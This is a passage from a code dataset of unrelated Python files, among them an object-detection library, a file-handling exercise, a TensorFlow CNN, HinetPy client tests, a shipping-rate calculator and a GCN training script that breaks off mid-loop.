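# A quick numeric check of iou_calculation (illustrative values): for the format-2\r\n# boxes [0.9, 0, 0, 1, 1, 1] and [0.8, 0.5, 0, 1.5, 1, 1] the intersection is a\r\n# 0.5 x 1 strip, so IoU = 0.5 / (1 + 1 - 0.5) = 1/3.\r\n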
# Step 3: function 5\r\ndef non_max_suppression(data_, thresh_=0.5):\r\n    \"\"\"\r\n    Parameters:\r\n        data_: The 3-dimensional list containing information about one box per square and coordinates expressed\r\n            in format 2\r\n        thresh_: Intersection-over-union threshold parameter with default value of 0.5\r\n    Return:\r\n        A subset of input boxes in form of a 2-dimensional array without overlapping boxes. Two boxes are considered\r\n        to be overlapping if their intersection-over-union value is higher than the thresh_ input parameter\r\n    \"\"\"\r\n    sorted_data = sorted(data_, reverse=True, key=lambda x: x[0])\r\n    for index, el1 in enumerate(sorted_data):\r\n        if el1 in data_:\r\n            for el2 in sorted_data[index+1:]:\r\n                if el2 in data_ and iou_calculation(el1, el2) > thresh_:\r\n                    data_.remove(el2)\r\n    return data_\r\n\r\n\r\ndef print_data(data_, cat_dict_):\r\n    \"\"\"\r\n    Parameters:\r\n        data_: The 3-dimensional list containing information about one box per square and coordinates expressed\r\n            in format 2\r\n        cat_dict_: Dictionary of categories of detectable items\r\n    Return:\r\n        A list of strings containing information about each detected item, their category and position\r\n    \"\"\"\r\n    output_list = []\r\n    for box in data_:\r\n        output_str = cat_dict_[box[-1]].capitalize() + \\\r\n                     \" detected with probability \" + \\\r\n                     \"{0:.2f}\".format(box[0]) + \\\r\n                     \" at ((\" + str(int(box[1])) + \", \" + str(int(box[2])) + \"), \" +\\\r\n                     \"(\" + str(int(box[3])) + \", \" + str(int(box[4])) + \"))\"\r\n        output_list.append(output_str)\r\n    return output_list\r\n\r\n\r\n# Function 6\r\ndef object_detection(photo_dim, original_data, categories, iou_threshold=0.5, filtering_threshold=0.5):\r\n    \"\"\"\r\n    Parameters:\r\n        photo_dim: Original photo dimensions\r\n        original_data: A 4-dimensional list containing the raw data, will not be modified\r\n        categories: List of categories of detectable objects\r\n        iou_threshold: Intersection over union threshold value, with default value of 0.5\r\n        filtering_threshold: Filtering threshold value, with default value of 0.5\r\n    Return:\r\n        A list of strings containing information about each detected item, their category and position\r\n    \"\"\"\r\n\r\n    # creating a copy to leave original_data unmodified\r\n    data = deepcopy(original_data)\r\n\r\n    # checking data structure for anomalies and read data dimensions\r\n    n_size = data_structure_check(data, photo_dim, categories)\r\n\r\n    # creating a dictionary for categories\r\n    cat_dict = create_dict(categories)\r\n\r\n    # Step 1.a: class determination\r\n    data = determine_class(data)\r\n    # Step 1.b: coordinates conversion\r\n    data = coordinates_conversion(data, n_size)\r\n\r\n    # Step 2: filtering\r\n    data = filtering(data, filtering_threshold)\r\n\r\n    # Step 3: Non-max suppression\r\n    data = non_max_suppression(data, iou_threshold)\r\n\r\n    # Output: List of string stating category detected with given probability (.2f) at location (in format 2)\r\n    output_list = print_data(data, cat_dict)\r\n\r\n    return output_list\r\n","sub_path":"OD_lib.py","file_name":"OD_lib.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"191451515","text":"import os\n\n#1. Open the filenames.txt file with read-only access with the open() function\nfile_object0 = open('filenames.txt', 'r')\nprint(file_object0)\nfile_object0.close()\n\n#2. Print the name of the file and if it is open or closed using the .name and .closed properties\n\nprint(file_object0.name)\nprint(file_object0.closed)\n\n#3. Use a for loop to read all lines of filenames.txt into a list variable\nfile_object = open('filenames.txt', 'r')\nfile_list = []\n\nfor each in file_object:\n    print(each)\n    file_list.append(each)\n\n\n#4. Print out all the lines from the file from your variable\nprint('blagh', file_list)\n\n#5. 
Close the filenames.txt file and print if the file is open or closed\nfile_object.close()\nprint(file_object.closed)\n\n#6. Create a file using the open() function called secrets.txt\nfile_secrets = open('secrets.txt', 'w')\n\n#7. Write your own secrets to the file with the write() function\nfile_secrets.write('Don\\'t tell anybody about this... shhhhh!!!!')\n\n#8. Close the secrets.txt file using the close() method. DON'T FORGET!\nfile_secrets.close()\n\n#9. Print out the contents of the text file in your terminal to prove it worked\nfile_secrets_check = open('secrets.txt', 'r')\nprint(file_secrets_check)\n\nfile_test = []\nfor each in file_secrets_check:\n print(each)\n file_test.append(each)\n\nprint('confirm this works: ', file_test)\n\n#cat secrets.txt\nfile_secrets_check.close()\n\n#10. Open your secrets.txt file in append mode and write some more super secret info\nfile_secret_anew = open('secrets.txt', 'a')\nfile_secret_anew.write('\\nok this is the last straw')\n\nprint(file_secret_anew);\n\n#11. Close the secrets.txt file again using the close() function\nfile_secret_anew.close()\n\n#12. Rename the secrets.txt and make it a \"hidden\" file named .supersecret.txt using the os.rename() function\nos.rename('secrets.txt', '.supersecret.txt')\n\n#13. See if you can see the file in your file explorer\n\n\n#14. Create a list variable named file_names that contains a list of filenames\n\n#15. Use the writelines() function to append the filenames to the filenames.txt file\n\n#16. Delete the initial secrets.txt file now that you have a super secret hidden version\n\n#17. BOSS LEVEL: Use the input() function to accept user input of a filename to create and create that file.\n","sub_path":"exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"432397705","text":"# ConvNet\n\nfrom __future__ import print_function\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n\ndef compute_accuracy(v_xs, v_ys):\n global prediction\n y_pred = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n correct_prediction = tf.equal(tf.argmax(y_pred, 1), tf.argmax(v_ys, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n result = sess.run(accuracy, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n return result\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv2d(x, W):\n # stride [1, x_movement, y_movement, 1]\n # Must have strides[0] = strides[3] = 1\n # valid padding: shrinkage; same padding: bleeding -> same size\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n # stride [1, x_movement, y_movement, 1]\n return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n\n# define placeholder for inputs to network\nxs = tf.placeholder(tf.float32, [None, 784]) # 28x28\nys = tf.placeholder(tf.float32, [None, 10])\nkeep_prob = tf.placeholder(tf.float32)\n\nx_image=tf.reshape(xs,[-1, 28, 28, 1]) # -1 regardless the sample size\nprint(x_image.shape)\n\n# conv1\nW_conv1 = weight_variable([5, 5, 1, 32]) # kernel/patch 5x5, in (thick) 1, out 32\nb_conv1 = bias_variable([32])\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1)+b_conv1) 
# output 28x28x32\nh_pool1 = max_pool_2x2(h_conv1) # output 14x14x32\n\n# conv2\nW_conv2 = weight_variable([5, 5, 32, 64]) # in 32, out 64\nb_conv2 = bias_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2)+b_conv2) # out 14x14x64\nh_pool2 = max_pool_2x2(h_conv2) # out 7x7x64\n\n# flatten\nh_pool2_flat=tf.reshape(h_pool2, [-1, 7*7*64])\n\n# fc1\nW_fc1 = weight_variable([7*7*64, 1024]) \nb_fc1 = bias_variable([1024])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1)+b_fc1)\nh_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)\n\n# fc2\nW_fc2 = weight_variable([1024, 10])\nb_fc2 = bias_variable([10])\nprediction=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2)+b_fc2)\n\n# the error between prediction and real data\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(ys * tf.log(prediction), reduction_indices=[1]))\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy) # Adam requires smaller learning rate\n\nsess = tf.Session()\n\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nfor i in range(1000):\n    batch_xs, batch_ys = mnist.train.next_batch(100)\n    sess.run(train_step, feed_dict={xs: batch_xs, ys: batch_ys, keep_prob: 0.5})\n    if i % 50 == 0:\n        print(compute_accuracy(mnist.test.images, mnist.test.labels))","sub_path":"tf_cnn.py","file_name":"tf_cnn.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218637778","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport shutil\nfrom datetime import datetime, date\n\nimport pytest\nimport requests\n\nfrom HinetPy import Client\n\nusername = \"test_username\"\npassword = \"test_password\"\n\n\n# http://docs.pytest.org/en/latest/fixture.html\n#@pytest.fixture is better, but pytest prior to 2.10 doesn't support it\n@pytest.yield_fixture(scope=\"module\")\ndef client():\n    client = Client(username, password)\n    client.select_stations('0101', ['N.AAKH', 'N.ABNH'])\n    yield client\n    client.select_stations('0101')\n\n\nclass TestClientLoginClass:\n    \"\"\"Login related tests\"\"\"\n    def test_client_init_and_login_succeed(self):\n        Client(username, password)\n\n    def test_client_init_and_login_fail(self):\n        \"\"\" Raise ConnectionError if requests fails. 
\"\"\"\n with pytest.raises(requests.ConnectionError):\n Client(\"anonymous\", \"anonymous\")\n\n def test_login_after_init(self):\n client = Client()\n client.login(username, password)\n\n\nclass TestClientCheckClass:\n def test_check_service_update(self, client):\n assert not client.check_service_update()\n\n def test_check_package_release(self, client):\n assert not client.check_package_release()\n\n def test_check_cmd_exists(self, client):\n assert client.check_cmd_exists()\n\n\nclass TestGetwaveformClass:\n def test_get_waveform_1(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 9)\n\n assert data == '0101_201001010000_9.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == '0101_20100101.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_starttime_in_string(self, client):\n data, ctable = client.get_waveform('0101', '2010-01-01T00:00', 9)\n\n assert data == '0101_201001010000_9.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == '0101_20100101.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_custom_name_1(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n data=\"customname1.cnt\",\n ctable=\"customname1.ch\")\n\n assert data == 'customname1.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == 'customname1.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_custom_name_2(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n data=\"customname2/customname2.cnt\",\n ctable=\"customname2/customname2.ch\")\n\n assert data == 'customname2/customname2.cnt'\n assert os.path.exists(data)\n assert ctable == 'customname2/customname2.ch'\n assert os.path.exists(ctable)\n shutil.rmtree(\"customname2\")\n\n def test_get_waveform_custom_name_3(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n outdir=\"customname3\")\n\n assert data == \"customname3/0101_201001010000_1.cnt\"\n assert os.path.exists(data)\n assert ctable == \"customname3/0101_20100101.ch\"\n assert os.path.exists(ctable)\n shutil.rmtree(\"customname3\")\n\n def test_get_waveform_custom_name_4(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n data=\"customname4-cnt/test.cnt\",\n ctable=\"customname4-ch/test.ch\",\n outdir=\"customname4-data\")\n\n assert data == \"customname4-cnt/test.cnt\"\n assert os.path.exists(data)\n assert ctable == \"customname4-ch/test.ch\"\n assert os.path.exists(ctable)\n shutil.rmtree(\"customname4-cnt\")\n shutil.rmtree(\"customname4-ch\")\n\n\nclass TestGetwaveformSpanClass:\n def test_get_waveform_wrong_span_1(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n client.get_waveform('0101', starttime, 0)\n\n def test_get_waveform_wrong_span_2(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n client.get_waveform('0101', starttime, -4)\n\n def test_get_waveform_wrong_span_3(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(TypeError):\n client.get_waveform('0101', starttime, 2.5)\n\n def test_get_waveform_span_larger_than_int(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n 
client.get_waveform('0101', starttime, 400000)\n\n def test_get_waveform_larger_max_span(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 10, max_span=65)\n assert data == '0101_201001010000_10.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == '0101_20100101.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_wrong_starttime(self, client):\n starttime = datetime(2001, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n client.get_waveform('0101', starttime, 1)\n\n\nclass TestGetCatalogClass:\n def test_get_arrivaltime_1(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_arrivaltime(startdate, 5)\n assert data == 'measure_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_arrivaltime_2(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_arrivaltime(startdate, 5, filename=\"arrivaltime.txt\")\n assert data == \"arrivaltime.txt\"\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_arrivaltime_use_datetime(self, client):\n startdate = datetime(2010, 1, 1)\n data = client.get_arrivaltime(startdate, 5)\n assert data == 'measure_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_arrivaltime_startdate_in_string(self, client):\n data = client.get_arrivaltime('20100101', 5)\n assert data == 'measure_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_focalmechanism_1(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_focalmechanism(startdate, 5)\n assert data == 'focal_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_focalmachanism_2(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_focalmechanism(startdate, 5, filename=\"focal.txt\")\n assert data == \"focal.txt\"\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_focalmachanism_use_datetime(self, client):\n startdate = datetime(2010, 1, 1)\n data = client.get_focalmechanism(startdate, 5, filename=\"focal.txt\")\n assert data == \"focal.txt\"\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_catalog_wrong_span(self, client):\n startdate = date(2010, 1, 1)\n with pytest.raises(ValueError):\n data = client.get_arrivaltime(startdate, 10)\n\n\n\nclass TestClientOthersClass:\n\n def test_get_allowed_span(self, client):\n assert client._get_allowed_span('0401') == 60\n client.select_stations('0101')\n assert client._get_allowed_span('0101') == 5\n client.select_stations('0101', ['N.AAKH', 'N.ABNH'])\n assert client._get_allowed_span('0101') == 60\n\n def test_get_selected_stations(self, client):\n client.get_selected_stations('0101')\n client.get_selected_stations('0103')\n with pytest.raises(ValueError):\n client.get_selected_stations('0501')\n\n","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"649396929","text":"import os\n\n\ndef test_dotfiles(host):\n homedir = os.environ[\"HOME\"] + \"/\"\n files = [\".tigrc\",\n \".tmux.conf\",\n \".vimrc\",\n \".zshrc\",\n \".hammerspoon/init.lua\"]\n for file in files:\n dotfile = host.file(homedir + file)\n assert 
dotfile.is_file\n","sub_path":"roles/dotfiles/tests/test_dotfile.py","file_name":"test_dotfile.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"468961205","text":"import pandas as pd\n\nfrom fastsemsim.SemSim import *\n\nimport matplotlib.pyplot as plt\n\nfrom rpy2.robjects import pandas2ri\npandas2ri.activate()\nfrom mpl_toolkits.mplot3d import Axes3D\nimport constants\n\nfrom scipy.cluster import hierarchy\nimport scipy.cluster.hierarchy as hcl\nfrom scipy.spatial.distance import squareform\n\n\nimport utils.go\nimport utils.go_hierarcies\nimport math\nimport random\nimport matplotlib.cm as cm\n\nfrom matplotlib.lines import Line2D\nimport matplotlib.colors as ml_colors\n\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable, axes_size\n\nENABLE_GO_GRAPH = False\nIS_GO_GRAPH_ONLY=False\nGO_PCA=False\nTERMS_SIMILARITY_TO_NUM_OF_TERMS=True\nRATIO_TO_GO_TERM = True\nQVAL_TH = 0.01\nSIM_TH= 0.4\n\nimport seaborn as sns\n\n\ndef plot_grid(path_format, datasets, algos):\n\n for dataset in datasets:\n df_grid=pd.DataFrame()\n for algo in algos:\n\n path=path_format.format(dataset=dataset, algo=algo)\n df_terms=pd.read_csv(path, sep='\\t')\n # df_terms = df_terms[df_terms[\"emp_pval\"]==0]\n df_terms = df_terms.iloc[:5,:]\n\n for cur_i, cur_row in df_terms.iterrows():\n df_grid=df_grid.append({\"algo\": algo, 'go_name': cur_row['GO name'], 'hg_pval': cur_row['hg_pval']}, ignore_index=True)\n\n go_list = np.unique(df_grid[[\"go_name\"]])\n fig, ax = plt.subplots(figsize=(40, 40))\n ax.set_facecolor('#fffde3')\n ax.grid(color='gray')\n\n xs=[algos.index(a) for a in df_grid[\"algo\"]]\n ys=[list(go_list).index(a) for a in df_grid[\"go_name\"]]\n cs=[a for a in df_grid[\"hg_pval\"]]\n sc = ax.scatter(xs, ys, 300, c=cs, cmap='bwr', vmin=np.percentile(cs, 10),\n vmax=np.percentile(cs, 90))\n for x, y ,c in zip(xs, ys, cs):\n ax.annotate( \"{}\".format(round(c,2)), (x, y), color='green', size=20)\n ax.legend(loc='upper left')\n ax.margins(0.03, 0.03)\n\n ax.set_xlabel(\"algos\", fontdict={\"size\" : 35})\n plt.subplots_adjust(left=0.25, right=0.99, top=0.99, bottom=0.05)\n plt.xticks(np.arange(len(algos)), tuple(algos), rotation='vertical', size=35)\n ax.set_ylabel(\"algos\", fontdict={\"size\" : 25})\n plt.yticks(np.arange(len(go_list)), tuple(go_list), size=35)\n ax_ = plt.gca()\n aspect = 20\n pad_fraction = 0.5\n divider = make_axes_locatable(ax_)\n width = axes_size.AxesY(ax_, aspect=1. 
/ aspect)\n pad = axes_size.Fraction(pad_fraction, width)\n cax = divider.append_axes(\"right\", size=0.3, pad=0.4)\n plt.colorbar(mappable=sc, cax=cax)\n cax.tick_params(labelsize=35)\n plt.tight_layout()\n plt.savefig(os.path.join(constants.OUTPUT_GLOBAL_DIR, \"grid_go_terms_{}.png\".format(dataset)))\n plt.clf()\n\n\ndef main():\n datasets=[\"TNFa_2\", \"HC12\", \"SHERA\", \"ROR_1\", \"SHEZH_1\", \"ERS_1\", \"IEM\"]\n algos = [\"jactivemodules_greedy\",\"jactivemodules_sa\",\"netbox\",\"hotnet2\",\"bionet\",\"keypathwayminer_INES_GREEDY\"]\n path_format = \"/home/hag007/Desktop/aggregate_report/oob/emp_diff_{dataset}_{algo}_passed_oob.tsv\"\n\n plot_grid(path_format, datasets, algos)\n\n\nif __name__==\"__main__\":\n main()","sub_path":"plots/old/grid_plot_go_terms.py","file_name":"grid_plot_go_terms.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570148436","text":"# Socket port and baudrate are also used as systemID\nBEACON_PORT = 7582\nSENSORS_PORT = 7586\n\nsystem_list = {\n 'Beacon':{\n 'id': BEACON_PORT,\n 'port': BEACON_PORT,\n 'tags': [444, 14954135790684542069]\n },\n 'Sensors':{\n 'id': SENSORS_PORT,\n 'port': SENSORS_PORT,\n 'tags': [0]\n },\n}\n\ndata_fields = [\n \"timestamp\", # time in milliseconds in epoch time\n # the device we want to locate (previously named tag_id)\n \"device_id\",\n # we use the UDP port as system id (for now at least, but we must change it to locate several device at a time)\n \"system_id\",\n # anchor used to take the current measure (previously named locator_id)\n \"anchor_id\",\n # [theta_x, theta_y, theta_z] corresponds to the orientation of the device (radian)\n \"theta_x\",\n \"theta_y\",\n \"theta_z\",\n \"txpower\", # transmitting power of the anchor\n \"rssi\", # signal strength received by the device\n # [acc_x, acc_y, acc_z] corresponds to the local acceleration vector of the device\n \"acc_x\",\n \"acc_y\",\n \"acc_z\",\n \"is_step_detected\" # step detected by imu\n]\n\n# These are the index of the values when we write them\ndata_timestamp = data_fields.index(\"timestamp\")\ndata_device_id = data_fields.index(\"device_id\")\ndata_system_id = data_fields.index(\"system_id\")\ndata_anchor_id = data_fields.index(\"anchor_id\")\ndata_txpower = data_fields.index(\"txpower\")\ndata_rssi = data_fields.index(\"rssi\")\ndata_theta_x = data_fields.index(\"theta_x\")\ndata_theta_y = data_fields.index(\"theta_y\")\ndata_theta_z = data_fields.index(\"theta_z\")\ndata_acc_x = data_fields.index(\"acc_x\")\ndata_acc_y = data_fields.index(\"acc_y\")\ndata_acc_z = data_fields.index(\"acc_z\")\n\n\ndef data_dict2list(dic):\n return [dic[f] if f in list(dic.keys()) else 'NaN' for f in data_fields]\n\n\ndef data_list2dict(array):\n dic = {}\n for k in range(len(array)):\n val = array[k]\n if val is not None and not val == 'NaN':\n field = data_fields[k]\n dic[field] = val\n return dic\n\n\nimu_raw_fields = [\n \"timestamp\",\n \"device_id\",\n \"system_id\",\n \"accelerometer_x\",\n \"accelerometer_y\",\n \"accelerometer_z\",\n \"magnetic_field_x\",\n \"magnetic_field_y\",\n \"magnetic_field_z\",\n \"gravity_x\",\n \"gravity_y\",\n \"gravity_z\",\n \"linear_acceleration_x\",\n \"linear_acceleration_y\",\n \"linear_acceleration_z\",\n \"gyroscope_x\",\n \"gyroscope_y\",\n \"gyroscope_z\",\n \"orientation_qx\",\n \"orientation_qy\",\n \"orientation_qz\",\n \"orientation_qw\",\n \"orientation_gravaccgyro_qx\",\n \"orientation_gravaccgyro_qy\",\n 
\"orientation_gravaccgyro_qz\",\n \"orientation_gravaccgyro_qw\",\n \"orientation_accgyro_qx\",\n \"orientation_accgyro_qy\",\n \"orientation_accgyro_qz\",\n \"orientation_accgyro_qw\",\n \"is_step_detected_sensor\",\n \"is_step_detected\"\n]\n\n\ndef imu_raw_dict2list(dic):\n return [dic[f] if f in list(dic.keys()) else 'NaN' for f in imu_raw_fields]\n","sub_path":"Acquisition/ubiment_parameters.py","file_name":"ubiment_parameters.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636336445","text":"'''\n This program calculates the shipping rates for one or more packages, based on the\n rates below.\n Created by Caleb Gibney (2015-6-8)\n\n Weight of package Rate per Pound\n ----------------- --------------\n 3 pounds or less $2.20\n over 3 pounds but not more than 5 pounds $3.10\n over 5 pounds but not more than 8 pounds $3.70\n over 8 pounds $4.50 \n'''\nRATE1 = 2.2\nRATE2 = 3.1\nRATE3 = 3.7\nRATE4 = 4.5\n\n# Defining main function\ndef main():\n \n # Control variable for while loop\n keep_going = \"Y\"\n\n # Main while loop for program. Used so the end user can easily restart the program\n while keep_going == \"Y\" or keep_going == \"y\":\n \n print(\"Welcome to the (insert company name here) Calculator \" + \\\n \"for Shipping Charges \\n\")\n\n # Getting number of packages from user and assigning it to variable 'packages'\n packages = int(input(\"Enter number of packages to calculate: \"))\n\n # Error trap for incorrect number of packages. Loop will stay true until\n # the user inputs correct data.\n while packages < 1:\n print(\"Number of packages must not be less than 1\")\n packages = int(input(\"Enter number of packages to calculate: \"))\n\n # Creating accumulator variable to calculate total cost of shipping\n total = 0\n\n # For loop to calculate one or more package shipping rates.\n # 2 arguments for the range function. Starting value is 1 and\n # the value of packages is incremented by 1 for better readability by the user.\n for counter in range(1,packages+1):\n print(\"\\nEnter weight of package #\", counter, \": \", sep='', end='')\n weight = float(input())\n\n # Error trap for bad weight. Will stay true until user puts in proper weight\n while weight <= 0:\n print(\"Weight must not be less than or equal to 0 lbs\")\n print(\"\\nEnter weight of package #\", counter, \": \", sep='', end='')\n weight = float(input())\n\n # Decision structures for variable rate (dependent on weight of package) \n if weight <= 3:\n rate = 2.20\n elif weight <= 5:\n rate = 3.10\n elif weight <= 8:\n rate = 3.70\n else:\n rate = 4.50\n cost = weight * rate\n\n # Accumulating costs to the total variable for every loop, so that the \n # total can be calculated \n total += cost\n\n # Printing information to the user for every package calculated\n print(\"\\nPackage #\", counter, \": Weight: \", format(weight, ','), \\\n \" lbs. Rate: $\", format(rate, '.2f'), \\\n \" per lb. Shipping charge: $\", format(cost, ',.2f'), sep='')\n\n # Printing total for the user \n print(\"\\nTotal shipping charge: $\", format(total, ',.2f'), sep='')\n # Prompting the user to quit or continue, and assigning that value to\n # the keep_going variable\n keep_going = input(\"\\nDo you wish to calculate more rates? 
Enter 'Y' \" + \\\n \"to continue or 'N' to quit: \")\n# Calling main function to start the program\nmain()\n","sub_path":"CalebGibneyUnit2.py","file_name":"CalebGibneyUnit2.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"49323754","text":"from __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport time\r\nimport tensorflow as tf\r\nfrom itertools import product\r\nfrom gcn.utils import *\r\nfrom gcn.models import GCN, MLP\r\nimport sys \r\nimport ast \r\nfrom shutil import copyfile\r\n\r\n# Set random seed\r\nseed = 123\r\nnp.random.seed(seed)\r\ntf.set_random_seed(seed)\r\n\r\n\r\nbest_model_path = sys.argv[1]\r\n\r\nconfigs = pkl_load(best_model_path+'/configs_dict.pkl')\r\n\r\n# Load data\r\nadj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask = load_data(configs['dataset'])\r\n\r\n# Some preprocessing\r\nfeatures = preprocess_features(features)\r\nif configs['model'] == 'gcn':\r\n support = [preprocess_adj(adj)]\r\n num_supports = 1\r\n model_func = GCN\r\nelif configs['model'] == 'gcn_cheby':\r\n support = chebyshev_polynomials(adj, configs['max_degree'])\r\n num_supports = 1 + configs['max_degree']\r\n model_func = GCN\r\nelif configs['model'] == 'dense':\r\n support = [preprocess_adj(adj)] # Not used\r\n num_supports = 1\r\n model_func = MLP\r\nelse:\r\n raise ValueError('Invalid argument for model: ' + str(configs['model']))\r\n\r\nconfigs['num_indices'] = support[0][0].shape[0]\r\nconfigs['num_nodes'] = support[0][2][0]\r\n\r\nif configs.get('propagate_labels',False):\r\n if configs.get('learnable_label_propagation',False):\r\n configs['label_aggregator_matrix'] = indices_to_aggregator(sparse_to_tuple(adj)[0])\r\n else:\r\n configs['label_aggregator_matrix'] = sparse_to_tuple(row_normalize_sparse_matrix(adj))\r\n\r\n# Define placeholders\r\nplaceholders = {\r\n 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)],\r\n 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)),\r\n 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])),\r\n 'labels_mask': tf.placeholder(tf.int32),\r\n 'dropout': tf.placeholder_with_default(0., shape=()),\r\n 'num_features_nonzero': tf.placeholder(tf.int32) # helper variable for sparse dropout\r\n}\r\n\r\n# Create model\r\nmodel = model_func(placeholders, configs, input_dim=features[2][1], logging=True)\r\n\r\n# Initialize session\r\nsess = tf.Session()\r\n\r\n\r\n# Define model evaluation function\r\ndef evaluate(features, support, labels, mask, placeholders):\r\n t_test = time.time()\r\n feed_dict_val = construct_feed_dict(features, support, labels, mask, placeholders)\r\n outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val)\r\n return outs_val[0], outs_val[1], (time.time() - t_test)\r\n\r\n\r\n# Init variables\r\nsess.run(tf.global_variables_initializer())\r\n\r\ncost_val = []\r\nbest_val = 0.0\r\n\r\n# Train model\r\nfor epoch in range(configs['epochs']):\r\n\r\n t = time.time()\r\n # Construct feed dictionary\r\n feed_dict = construct_feed_dict(features, support, y_train, train_mask, placeholders)\r\n feed_dict.update({placeholders['dropout']: configs['dropout']})\r\n\r\n # Training step\r\n outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict)\r\n\r\n # Validation\r\n cost, acc, duration = evaluate(features, support, y_val, val_mask, placeholders)\r\n cost_val.append(cost)\r\n\r\n 
